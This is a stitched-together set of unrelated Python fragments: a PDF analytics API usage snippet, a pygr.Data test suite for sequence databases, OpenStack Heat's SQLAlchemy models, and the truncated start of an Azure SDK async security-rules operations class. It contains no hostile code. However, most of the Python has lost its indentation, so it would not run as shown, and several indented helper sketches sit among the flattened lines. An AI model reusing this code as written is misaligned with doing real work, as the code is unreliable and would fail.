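# Minimal usage sketch (illustrative only): the token and file name below
# are placeholders, and a reachable PDF Analytics server is assumed.
demo_client = APIClient(token='my-api-token')
demo_job = demo_client.create_job('report.pdf')  # uploads and waits for analysis
if demo_job.get_status() == 'Complete':
print(demo_job.verify_text('Expected text', left=150, top=200, page=1))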
|
|
import unittest, os, pickle, datetime
import warnings
import testlib
from testlib import testutil, SkipTest, PygrTestProgram
from pygr import seqdb, cnestedlist, mapping
from pygr.downloader import SourceURL, GenericBuilder
warnings.simplefilter("ignore")
import pygr.Data
warnings.simplefilter("default")
try:
set
except NameError:
from sets import Set as set
class TestBase(unittest.TestCase):
"A base class to all pygr.Data test classes"
def setUp(self, pygrDataPath=None, **kwargs):
# overwrite the WORLDBASEPATH environment variable
self.tempdir = testutil.TempDir('pygrdata')
if pygrDataPath is None:
pygrDataPath = self.tempdir.path
pygr.Data.clear_cache() # make sure no old data loaded
pygr.Data.update(pygrDataPath, **kwargs) # use this path
# handy shortcuts
self.EQ = self.assertEqual
class Download_Test(TestBase):
"Save seq db and interval to pygr.Data shelve"
# tested elsewhere as well, on Linux makes gzip ask for permissions
# to overwrite
def test_download(self):
"Downloading of gzipped file using pygr.Data"
url = SourceURL('http://www.doe-mbi.ucla.edu/~leec/test.gz')
url.__doc__ = 'test download'
pygr.Data.addResource('Bio.Test.Download1', url)
pygr.Data.save()
# performs the download
fpath = pygr.Data.Bio.Test.Download1()
h = testutil.get_file_md5(fpath)
self.assertEqual(h.hexdigest(), 'f95656496c5182d6cff9a56153c9db73')
os.remove(fpath)
class GenericBuild_Test(TestBase):
def test_generic_build(self):
"GenericBuilder construction of the BlastDB"
sp_hbb1 = testutil.datafile('sp_hbb1')
gb = GenericBuilder('BlastDB', sp_hbb1)
s = pickle.dumps(gb)
db = pickle.loads(s) # force construction of the BlastDB
self.EQ(len(db), 24)
found = [x for x in db]
found.sort()
expected = ['HBB0_PAGBO', 'HBB1_ANAMI', 'HBB1_CYGMA', 'HBB1_IGUIG',
'HBB1_MOUSE', 'HBB1_ONCMY', 'HBB1_PAGBO', 'HBB1_RAT',
'HBB1_SPHPU', 'HBB1_TAPTE', 'HBB1_TORMA', 'HBB1_TRICR',
'HBB1_UROHA', 'HBB1_VAREX', 'HBB1_XENBO', 'HBB1_XENLA',
'HBB1_XENTR', 'MYG_DIDMA', 'MYG_ELEMA', 'MYG_ERIEU',
'MYG_ESCGI', 'MYG_GALCR', 'PRCA_ANASP', 'PRCA_ANAVA']
expected.sort()
self.EQ(expected, found)
class DNAAnnotation_Test(TestBase):
def setUp(self,**kwargs):
TestBase.setUp(self)
dnaseq = testutil.datafile('dnaseq.fasta')
tryannot = testutil.tempdatafile('tryannot')
db = seqdb.BlastDB(dnaseq)
try:
db.__doc__ = 'little dna'
pygr.Data.Bio.Test.dna = db
annoDB = seqdb.AnnotationDB({1:('seq1',5,10,'fred'),
2:('seq1',-60,-50,'bob'),
3:('seq2',-20,-10,'mary')},
db,
sliceAttrDict=dict(id=0, start=1, stop=2,
name=3))
annoDB.__doc__ = 'trivial annotation'
pygr.Data.Bio.Test.annoDB = annoDB
nlmsa = cnestedlist.NLMSA(tryannot,'w',pairwiseMode=True,
bidirectional=False)
try:
for annID in annoDB:
nlmsa.addAnnotation(annoDB[annID])
nlmsa.build()
nlmsa.__doc__ = 'trivial map'
pygr.Data.Bio.Test.map = nlmsa
pygr.Data.schema.Bio.Test.map = \
pygr.Data.ManyToManyRelation(db, annoDB,bindAttrs=('exons',))
pygr.Data.save()
pygr.Data.clear_cache()
finally:
nlmsa.close()
finally:
db.close()
def test_annotation(self):
"Annotation test"
db = pygr.Data.Bio.Test.dna()
try:
s1 = db['seq1']
l = s1.exons.keys()
annoDB = pygr.Data.Bio.Test.annoDB()
assert l == [annoDB[1], -(annoDB[2])]
assert l[0].sequence == s1[5:10]
assert l[1].sequence == s1[50:60]
assert l[0].name == 'fred','test annotation attribute access'
assert l[1].name == 'bob'
sneg = -(s1[:55])
l = sneg.exons.keys()
assert l == [annoDB[2][5:], -(annoDB[1])]
assert l[0].sequence == -(s1[50:55])
assert l[1].sequence == -(s1[5:10])
assert l[0].name == 'bob'
assert l[1].name == 'fred'
finally:
db.close() # close SequenceFileDB
pygr.Data.Bio.Test.map().close() # close NLMSA
def populate_swissprot():
"Populate the current pygrData with swissprot data"
# build BlastDB out of the sequences
sp_hbb1 = testutil.datafile('sp_hbb1')
sp = seqdb.BlastDB(sp_hbb1)
sp.__doc__ = 'little swissprot'
pygr.Data.Bio.Seq.Swissprot.sp42 = sp
# also store a fragment
hbb = sp['HBB1_TORMA']
ival= hbb[10:35]
ival.__doc__ = 'fragment'
pygr.Data.Bio.Seq.frag = ival
# build a mapping to itself
m = mapping.Mapping(sourceDB=sp,targetDB=sp)
trypsin = sp['PRCA_ANAVA']
m[hbb] = trypsin
m.__doc__ = 'map sp to itself'
pygr.Data.Bio.Seq.spmap = m
# create an annotation database and bind as exons attribute
pygr.Data.schema.Bio.Seq.spmap = \
pygr.Data.OneToManyRelation(sp, sp, bindAttrs=('buddy',))
annoDB = seqdb.AnnotationDB({1:('HBB1_TORMA',10,50)}, sp,
sliceAttrDict=dict(id=0, start=1, stop=2))
exon = annoDB[1]
# generate the names where these will be stored
tempdir = testutil.TempDir('exonAnnot')
filename = tempdir.subfile('cnested')
nlmsa = cnestedlist.NLMSA(filename, 'w', pairwiseMode=True,
bidirectional=False)
nlmsa.addAnnotation(exon)
nlmsa.build()
annoDB.__doc__ = 'a little annotation db'
nlmsa.__doc__ = 'a little map'
pygr.Data.Bio.Annotation.annoDB = annoDB
pygr.Data.Bio.Annotation.map = nlmsa
pygr.Data.schema.Bio.Annotation.map = \
pygr.Data.ManyToManyRelation(sp, annoDB, bindAttrs=('exons',))
def check_match(self):
frag = pygr.Data.Bio.Seq.frag()
correct = pygr.Data.Bio.Seq.Swissprot.sp42()['HBB1_TORMA'][10:35]
assert frag == correct, 'seq ival should match'
assert frag.__doc__ == 'fragment', 'docstring should match'
assert str(frag) == 'IQHIWSNVNVVEITAKALERVFYVY', 'letters should match'
assert len(frag) == 25, 'length should match'
assert len(frag.path) == 142, 'length should match'
#store = PygrDataTextFile('results/seqdb1.pickle')
#saved = store['hbb1 fragment']
#assert frag == saved, 'seq ival should matched stored result'
def check_dir(self):
expected=['Bio.Annotation.annoDB', 'Bio.Annotation.map',
'Bio.Seq.Swissprot.sp42', 'Bio.Seq.frag', 'Bio.Seq.spmap']
expected.sort()
found = pygr.Data.dir('Bio')
found.sort()
assert found == expected
def check_dir_noargs(self):
found = pygr.Data.dir()
found.sort()
found2 = pygr.Data.dir('')
found2.sort()
assert found == found2
def check_dir_download(self):
found = pygr.Data.dir(download=True)
found.sort()
found2 = pygr.Data.dir('', download=True)
found2.sort()
assert len(found) == 0
assert found == found2
def check_dir_re(self):
expected=['Bio.Annotation.annoDB', 'Bio.Annotation.map',
'Bio.Seq.Swissprot.sp42', 'Bio.Seq.frag', 'Bio.Seq.spmap']
expected.sort()
found = pygr.Data.dir('^Bio', 'r')
found.sort()
assert found == expected
expected = ['Bio.Seq.Swissprot.sp42', 'Bio.Seq.spmap']
expected.sort()
found = pygr.Data.dir(r'^Bio\..+\.sp', 'r')
found.sort()
assert found == expected
def check_bind(self):
sp = pygr.Data.Bio.Seq.Swissprot.sp42()
hbb = sp['HBB1_TORMA']
trypsin = sp['PRCA_ANAVA']
assert hbb.buddy == trypsin, 'automatic schema attribute binding'
def check_bind2(self):
sp = pygr.Data.Bio.Seq.Swissprot.sp42()
hbb = sp['HBB1_TORMA']
exons = hbb.exons.keys()
assert len(exons)==1, 'number of expected annotations'
annoDB = pygr.Data.Bio.Annotation.annoDB()
exon = annoDB[1]
assert exons[0] == exon, 'test annotation comparison'
assert exons[0].pathForward is exon,'annotation parent match'
assert exons[0].sequence == hbb[10:50],'annotation to sequence match'
onc = sp['HBB1_ONCMY']
try:
exons = onc.exons.keys()
raise ValueError('failed to catch query with no annotations')
except KeyError:
pass
class Sequence_Test(TestBase):
def setUp(self, *args, **kwargs):
TestBase.setUp(self, *args, **kwargs)
populate_swissprot()
pygr.Data.save() # finally save everything
pygr.Data.clear_cache() # force all requests to reload
def test_match(self):
"Test matching sequences"
check_match(self)
def test_dir(self):
"Test labels"
check_dir(self)
check_dir_noargs(self)
check_dir_re(self)
def test_bind(self):
"Test bind"
check_bind(self)
check_bind2(self)
def test_schema(self):
"Test schema"
sp_hbb1 = testutil.datafile('sp_hbb1')
sp2 = seqdb.BlastDB(sp_hbb1)
sp2.__doc__ = 'another sp'
pygr.Data.Bio.Seq.sp2 = sp2
sp = pygr.Data.Bio.Seq.Swissprot.sp42()
m = mapping.Mapping(sourceDB=sp,targetDB=sp2)
m.__doc__ = 'sp -> sp2'
pygr.Data.Bio.Seq.testmap = m
pygr.Data.schema.Bio.Seq.testmap = pygr.Data.OneToManyRelation(sp, sp2)
pygr.Data.save()
pygr.Data.clear_cache()
sp3 = seqdb.BlastDB(sp_hbb1)
sp3.__doc__ = 'sp number 3'
pygr.Data.Bio.Seq.sp3 = sp3
sp2 = pygr.Data.Bio.Seq.sp2()
m = mapping.Mapping(sourceDB=sp3,targetDB=sp2)
m.__doc__ = 'sp3 -> sp2'
pygr.Data.Bio.Seq.testmap2 = m
pygr.Data.schema.Bio.Seq.testmap2 = pygr.Data.OneToManyRelation(sp3, sp2)
l = pygr.Data.getResource.resourceCache.keys() # list of cached resources
l.sort()
assert l == ['Bio.Seq.sp2', 'Bio.Seq.sp3', 'Bio.Seq.testmap2']
pygr.Data.save()
g = pygr.Data.getResource.writer.storage.graph
expected = set(['Bio.Annotation.annoDB',
'Bio.Seq.Swissprot.sp42', 'Bio.Seq.sp2', 'Bio.Seq.sp3'])
found = set(g.keys())
self.EQ(len(expected - found), 0)
class SQL_Sequence_Test(Sequence_Test):
def setUp(self):
if not testutil.mysql_enabled():
raise SkipTest, "no MySQL installed"
self.dbtable = testutil.temp_table_name() # create temp db tables
Sequence_Test.setUp(self, pygrDataPath='mysql:' + self.dbtable,
mdbArgs=dict(createLayer='temp'))
def tearDown(self):
testutil.drop_tables(pygr.Data.getResource.writer.storage.cursor,
self.dbtable)
class InvalidPickle_Test(TestBase):
def setUp(self):
TestBase.setUp(self)
class MyUnpicklableClass(object):
pass
MyUnpicklableClass.__module__ = '__main__'
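# Pointing __module__ at __main__ makes the class unresolvable when
# unpickled elsewhere, which pygr.Data.dumps should reject.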
self.bad = MyUnpicklableClass()
self.good = datetime.datetime.today()
def test_invalid_pickle(self):
"Testing an invalid pickle"
s = pygr.Data.dumps(self.good) # should pickle with no errors
try:
s = pygr.Data.dumps(self.bad) # should raise exception
msg = 'failed to catch attempt to pickle a reference to an invalid module'
raise ValueError(msg)
except pygr.Data.WorldbaseNoModuleError:
pass
class XMLRPC_Test(TestBase):
'create an XMLRPC server and access seqdb from it'
def setUp(self):
TestBase.setUp(self)
populate_swissprot() # save some data
pygr.Data.save() # finally save everything
pygr.Data.clear_cache() # force all requests to reload
res = [ 'Bio.Seq.Swissprot.sp42', 'Bio.Seq.frag', 'Bio.Seq.spmap',
'Bio.Annotation.annoDB', 'Bio.Annotation.map' ]
self.server = testutil.TestXMLRPCServer(res, self.tempdir.path)
def test_xmlrpc(self):
"Test XMLRPC"
pygr.Data.clear_cache() # force all requests to reload
pygr.Data.update("http://localhost:%s" % self.server.port)
check_match(self)
check_dir(self)
check_dir_noargs(self)
check_dir_download(self)
check_dir_re(self)
check_bind(self)
check_bind2(self)
sp_hbb1 = testutil.datafile('sp_hbb1')
sp2 = seqdb.BlastDB(sp_hbb1)
sp2.__doc__ = 'another sp'
try:
pygr.Data.Bio.Seq.sp2 = sp2
pygr.Data.save()
msg = 'failed to catch bad attempt to write to XMLRPC server'
raise KeyError(msg)
except ValueError:
pass
def tearDown(self):
'halt the test XMLRPC server'
self.server.close()
if __name__ == '__main__':
PygrTestProgram(verbosity=2)
|
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SQLAlchemy models for heat data.
"""
import uuid
from oslo_db.sqlalchemy import models
from oslo_utils import timeutils
import six
import sqlalchemy
from sqlalchemy.ext import declarative
from sqlalchemy.orm import backref
from sqlalchemy.orm import relationship
from sqlalchemy.orm import session as orm_session
from heat.db.sqlalchemy import types
BASE = declarative.declarative_base()
def get_session():
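# Local import avoids importing the db api at module load time.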
from heat.db.sqlalchemy import api as db_api
return db_api.get_session()
class HeatBase(models.ModelBase, models.TimestampMixin):
"""Base class for Heat Models."""
__table_args__ = {'mysql_engine': 'InnoDB'}
def expire(self, session=None, attrs=None):
"""Expire this object ()."""
if not session:
session = orm_session.Session.object_session(self)
if not session:
session = get_session()
session.expire(self, attrs)
def refresh(self, session=None, attrs=None):
"""Refresh this object."""
if not session:
session = orm_session.Session.object_session(self)
if not session:
session = get_session()
session.refresh(self, attrs)
def delete(self, session=None):
"""Delete this object."""
if not session:
session = orm_session.Session.object_session(self)
if not session:
session = get_session()
session.begin()
session.delete(self)
session.commit()
def update_and_save(self, values, session=None):
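"""Set the given attribute values and commit in the object's session."""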
if not session:
session = orm_session.Session.object_session(self)
if not session:
session = get_session()
session.begin()
for k, v in six.iteritems(values):
setattr(self, k, v)
session.commit()
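# A minimal sketch (illustrative name, not part of the Heat API) of the
# session-resolution order shared by expire/refresh/delete/update_and_save
# above: an explicitly passed session wins, then the session the instance
# is already bound to, then a fresh one from db_api.
def _resolve_session_sketch(obj, session=None):
    session = session or orm_session.Session.object_session(obj)
    return session or get_session()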
class SoftDelete(object):
deleted_at = sqlalchemy.Column(sqlalchemy.DateTime)
def soft_delete(self, session=None):
"""Mark this object as deleted."""
self.update_and_save({'deleted_at': timeutils.utcnow()},
session=session)
class StateAware(object):
action = sqlalchemy.Column('action', sqlalchemy.String(255))
status = sqlalchemy.Column('status', sqlalchemy.String(255))
status_reason = sqlalchemy.Column('status_reason', sqlalchemy.Text)
class RawTemplate(BASE, HeatBase):
"""Represents an unparsed template which should be in JSON format."""
__tablename__ = 'raw_template'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
template = sqlalchemy.Column(types.Json)
files = sqlalchemy.Column(types.Json)
environment = sqlalchemy.Column('environment', types.Json)
class StackTag(BASE, HeatBase):
"""Key/value store of arbitrary stack tags."""
__tablename__ = 'stack_tag'
id = sqlalchemy.Column('id',
sqlalchemy.Integer,
primary_key=True,
nullable=False)
tag = sqlalchemy.Column('tag', sqlalchemy.Unicode(80))
stack_id = sqlalchemy.Column('stack_id',
sqlalchemy.String(36),
sqlalchemy.ForeignKey('stack.id'),
nullable=False)
class SyncPoint(BASE, HeatBase):
"""Represents an syncpoint for an stack that is being worked on."""
__tablename__ = 'sync_point'
__table_args__ = (
sqlalchemy.PrimaryKeyConstraint('entity_id',
'traversal_id',
'is_update'),
sqlalchemy.ForeignKeyConstraint(['stack_id'], ['stack.id'])
)
entity_id = sqlalchemy.Column(sqlalchemy.String(36))
traversal_id = sqlalchemy.Column(sqlalchemy.String(36))
is_update = sqlalchemy.Column(sqlalchemy.Boolean)
# integer field for atomic update operations
atomic_key = sqlalchemy.Column(sqlalchemy.Integer, nullable=False)
stack_id = sqlalchemy.Column(sqlalchemy.String(36),
nullable=False)
input_data = sqlalchemy.Column(types.Json)
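# A minimal sketch (illustrative, not Heat's real query) of the
# compare-and-swap idiom the atomic_key column enables: the UPDATE matches
# only while atomic_key still holds the value this writer last read, so
# exactly one of several concurrent writers wins.
def _sync_point_bump_sketch(session, entity_id, traversal_id, is_update,
                            expected_key):
    rows = session.query(SyncPoint).filter_by(
        entity_id=entity_id,
        traversal_id=traversal_id,
        is_update=is_update,
        atomic_key=expected_key,
    ).update({'atomic_key': expected_key + 1})
    return rows == 1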
class Stack(BASE, HeatBase, SoftDelete, StateAware):
"""Represents a stack created by the heat engine."""
__tablename__ = 'stack'
__table_args__ = (
sqlalchemy.Index('ix_stack_name', 'name', mysql_length=255),
sqlalchemy.Index('ix_stack_tenant', 'tenant', mysql_length=255),
)
id = sqlalchemy.Column(sqlalchemy.String(36), primary_key=True,
default=lambda: str(uuid.uuid4()))
name = sqlalchemy.Column(sqlalchemy.String(255))
raw_template_id = sqlalchemy.Column(
sqlalchemy.Integer,
sqlalchemy.ForeignKey('raw_template.id'),
nullable=False)
raw_template = relationship(RawTemplate, backref=backref('stack'),
foreign_keys=[raw_template_id])
prev_raw_template_id = sqlalchemy.Column(
'prev_raw_template_id',
sqlalchemy.Integer,
sqlalchemy.ForeignKey('raw_template.id'))
prev_raw_template = relationship(RawTemplate,
foreign_keys=[prev_raw_template_id])
username = sqlalchemy.Column(sqlalchemy.String(256))
tenant = sqlalchemy.Column(sqlalchemy.String(256))
user_creds_id = sqlalchemy.Column(
sqlalchemy.Integer,
sqlalchemy.ForeignKey('user_creds.id'))
owner_id = sqlalchemy.Column(sqlalchemy.String(36))
parent_resource_name = sqlalchemy.Column(sqlalchemy.String(255))
timeout = sqlalchemy.Column(sqlalchemy.Integer)
disable_rollback = sqlalchemy.Column(sqlalchemy.Boolean, nullable=False)
stack_user_project_id = sqlalchemy.Column(sqlalchemy.String(64))
backup = sqlalchemy.Column('backup', sqlalchemy.Boolean)
nested_depth = sqlalchemy.Column('nested_depth', sqlalchemy.Integer)
convergence = sqlalchemy.Column('convergence', sqlalchemy.Boolean)
tags = relationship(StackTag, cascade="all,delete",
backref=backref('stack'))
current_traversal = sqlalchemy.Column('current_traversal',
sqlalchemy.String(36))
current_deps = sqlalchemy.Column('current_deps', types.Json)
# Override timestamp column to store the correct value: it should be the
# time the create/update call was issued, not the time the DB entry is
# created/modified. (bug #1193269)
updated_at = sqlalchemy.Column(sqlalchemy.DateTime)
class StackLock(BASE, HeatBase):
"""Store stack locks for deployments with multiple-engines."""
__tablename__ = 'stack_lock'
stack_id = sqlalchemy.Column(sqlalchemy.String(36),
sqlalchemy.ForeignKey('stack.id'),
primary_key=True)
engine_id = sqlalchemy.Column(sqlalchemy.String(36))
class UserCreds(BASE, HeatBase):
"""
Represents user credentials and mirrors the 'context'
handed in by wsgi.
"""
__tablename__ = 'user_creds'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
username = sqlalchemy.Column(sqlalchemy.String(255))
password = sqlalchemy.Column(sqlalchemy.String(255))
region_name = sqlalchemy.Column(sqlalchemy.String(255))
decrypt_method = sqlalchemy.Column(sqlalchemy.String(64))
tenant = sqlalchemy.Column(sqlalchemy.String(1024))
auth_url = sqlalchemy.Column(sqlalchemy.Text)
tenant_id = sqlalchemy.Column(sqlalchemy.String(256))
trust_id = sqlalchemy.Column(sqlalchemy.String(255))
trustor_user_id = sqlalchemy.Column(sqlalchemy.String(64))
stack = relationship(Stack, backref=backref('user_creds'))
class Event(BASE, HeatBase):
"""Represents an event generated by the heat engine."""
__tablename__ = 'event'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
stack_id = sqlalchemy.Column(sqlalchemy.String(36),
sqlalchemy.ForeignKey('stack.id'),
nullable=False)
stack = relationship(Stack, backref=backref('events'))
uuid = sqlalchemy.Column(sqlalchemy.String(36),
default=lambda: str(uuid.uuid4()),
unique=True)
resource_action = sqlalchemy.Column(sqlalchemy.String(255))
resource_status = sqlalchemy.Column(sqlalchemy.String(255))
resource_name = sqlalchemy.Column(sqlalchemy.String(255))
physical_resource_id = sqlalchemy.Column(sqlalchemy.String(255))
_resource_status_reason = sqlalchemy.Column(
'resource_status_reason', sqlalchemy.String(255))
resource_type = sqlalchemy.Column(sqlalchemy.String(255))
resource_properties = sqlalchemy.Column(sqlalchemy.PickleType)
@property
def resource_status_reason(self):
return self._resource_status_reason
@resource_status_reason.setter
def resource_status_reason(self, reason):
self._resource_status_reason = reason and reason[:255] or ''
class ResourceData(BASE, HeatBase):
"""Key/value store of arbitrary, resource-specific data."""
__tablename__ = 'resource_data'
id = sqlalchemy.Column('id',
sqlalchemy.Integer,
primary_key=True,
nullable=False)
key = sqlalchemy.Column('key', sqlalchemy.String(255))
value = sqlalchemy.Column('value', sqlalchemy.Text)
redact = sqlalchemy.Column('redact', sqlalchemy.Boolean)
decrypt_method = sqlalchemy.Column(sqlalchemy.String(64))
resource_id = sqlalchemy.Column('resource_id',
sqlalchemy.Integer,
sqlalchemy.ForeignKey('resource.id'),
nullable=False)
class Resource(BASE, HeatBase, StateAware):
"""Represents a resource created by the heat engine."""
__tablename__ = 'resource'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
uuid = sqlalchemy.Column(sqlalchemy.String(36),
default=lambda: str(uuid.uuid4()),
unique=True)
name = sqlalchemy.Column('name', sqlalchemy.String(255))
nova_instance = sqlalchemy.Column('nova_instance', sqlalchemy.String(255))
# odd name as "metadata" is reserved
rsrc_metadata = sqlalchemy.Column('rsrc_metadata', types.Json)
stack_id = sqlalchemy.Column(sqlalchemy.String(36),
sqlalchemy.ForeignKey('stack.id'),
nullable=False)
stack = relationship(Stack, backref=backref('resources'))
data = relationship(ResourceData,
cascade="all,delete",
backref=backref('resource'))
# Override timestamp column to store the correct value: it should be the
# time the create/update call was issued, not the time the DB entry is
# created/modified. (bug #1193269)
updated_at = sqlalchemy.Column(sqlalchemy.DateTime)
properties_data = sqlalchemy.Column('properties_data', types.Json)
properties_data_encrypted = sqlalchemy.Column('properties_data_encrypted',
sqlalchemy.Boolean)
engine_id = sqlalchemy.Column(sqlalchemy.String(36))
atomic_key = sqlalchemy.Column(sqlalchemy.Integer)
needed_by = sqlalchemy.Column('needed_by', types.List)
requires = sqlalchemy.Column('requires', types.List)
replaces = sqlalchemy.Column('replaces', sqlalchemy.Integer,
default=None)
replaced_by = sqlalchemy.Column('replaced_by', sqlalchemy.Integer,
default=None)
current_template_id = sqlalchemy.Column(
'current_template_id',
sqlalchemy.Integer,
sqlalchemy.ForeignKey('raw_template.id'))
class WatchRule(BASE, HeatBase):
"""Represents a watch_rule created by the heat engine."""
__tablename__ = 'watch_rule'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
name = sqlalchemy.Column('name', sqlalchemy.String(255))
rule = sqlalchemy.Column('rule', types.Json)
state = sqlalchemy.Column('state', sqlalchemy.String(255))
last_evaluated = sqlalchemy.Column(sqlalchemy.DateTime,
default=timeutils.utcnow)
stack_id = sqlalchemy.Column(sqlalchemy.String(36),
sqlalchemy.ForeignKey('stack.id'),
nullable=False)
stack = relationship(Stack, backref=backref('watch_rule'))
class WatchData(BASE, HeatBase):
"""Represents a watch_data created by the heat engine."""
__tablename__ = 'watch_data'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
data = sqlalchemy.Column('data', types.Json)
watch_rule_id = sqlalchemy.Column(
sqlalchemy.Integer,
sqlalchemy.ForeignKey('watch_rule.id'),
nullable=False)
watch_rule = relationship(WatchRule, backref=backref('watch_data'))
class SoftwareConfig(BASE, HeatBase):
"""
Represents a software configuration resource to be applied to
one or more servers.
"""
__tablename__ = 'software_config'
id = sqlalchemy.Column('id', sqlalchemy.String(36), primary_key=True,
default=lambda: str(uuid.uuid4()))
name = sqlalchemy.Column('name', sqlalchemy.String(255))
group = sqlalchemy.Column('group', sqlalchemy.String(255))
config = sqlalchemy.Column('config', types.Json)
tenant = sqlalchemy.Column(
'tenant', sqlalchemy.String(64), nullable=False, index=True)
class SoftwareDeployment(BASE, HeatBase, StateAware):
"""
Represents applying a software configuration resource to a
single server resource.
"""
__tablename__ = 'software_deployment'
__table_args__ = (
sqlalchemy.Index('ix_software_deployment_created_at', 'created_at'),)
id = sqlalchemy.Column('id', sqlalchemy.String(36), primary_key=True,
default=lambda: str(uuid.uuid4()))
config_id = sqlalchemy.Column(
'config_id',
sqlalchemy.String(36),
sqlalchemy.ForeignKey('software_config.id'),
nullable=False)
config = relationship(SoftwareConfig, backref=backref('deployments'))
server_id = sqlalchemy.Column('server_id', sqlalchemy.String(36),
nullable=False, index=True)
input_values = sqlalchemy.Column('input_values', types.Json)
output_values = sqlalchemy.Column('output_values', types.Json)
tenant = sqlalchemy.Column(
'tenant', sqlalchemy.String(64), nullable=False, index=True)
stack_user_project_id = sqlalchemy.Column(sqlalchemy.String(64))
updated_at = sqlalchemy.Column(sqlalchemy.DateTime)
class Snapshot(BASE, HeatBase):
__tablename__ = 'snapshot'
id = sqlalchemy.Column('id', sqlalchemy.String(36), primary_key=True,
default=lambda: str(uuid.uuid4()))
stack_id = sqlalchemy.Column(sqlalchemy.String(36),
sqlalchemy.ForeignKey('stack.id'),
nullable=False)
name = sqlalchemy.Column('name', sqlalchemy.String(255))
data = sqlalchemy.Column('data', types.Json)
tenant = sqlalchemy.Column(
'tenant', sqlalchemy.String(64), nullable=False, index=True)
status = sqlalchemy.Column('status', sqlalchemy.String(255))
status_reason = sqlalchemy.Column('status_reason', sqlalchemy.String(255))
stack = relationship(Stack, backref=backref('snapshot'))
class Service(BASE, HeatBase, SoftDelete):
__tablename__ = 'service'
id = sqlalchemy.Column('id',
sqlalchemy.String(36),
primary_key=True,
default=lambda: str(uuid.uuid4()))
engine_id = sqlalchemy.Column('engine_id',
sqlalchemy.String(36),
nullable=False)
host = sqlalchemy.Column('host',
sqlalchemy.String(255),
nullable=False)
hostname = sqlalchemy.Column('hostname',
sqlalchemy.String(255),
nullable=False)
binary = sqlalchemy.Column('binary',
sqlalchemy.String(255),
nullable=False)
topic = sqlalchemy.Column('topic',
sqlalchemy.String(255),
nullable=False)
report_interval = sqlalchemy.Column('report_interval',
sqlalchemy.Integer,
nullable=False)
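# A minimal sketch, assuming the heat/oslo imports above resolve: bind the
# declarative metadata to an in-memory SQLite engine, as a test fixture
# might (the mysql_engine table arg is simply ignored by SQLite).
def _create_schema_sketch():
    engine = sqlalchemy.create_engine('sqlite://')
    BASE.metadata.create_all(engine)
    return engine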
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class SecurityRulesOperations:
"""SecurityRulesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_11_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
network_security_group_name: str,
security_rule_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
network_security_group_name: str,
security_rule_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes the specified network security rule.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_security_group_name: The name of the network security group.
:type network_security_group_name: str
:param security_rule_name: The name of the security rule.
:type security_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
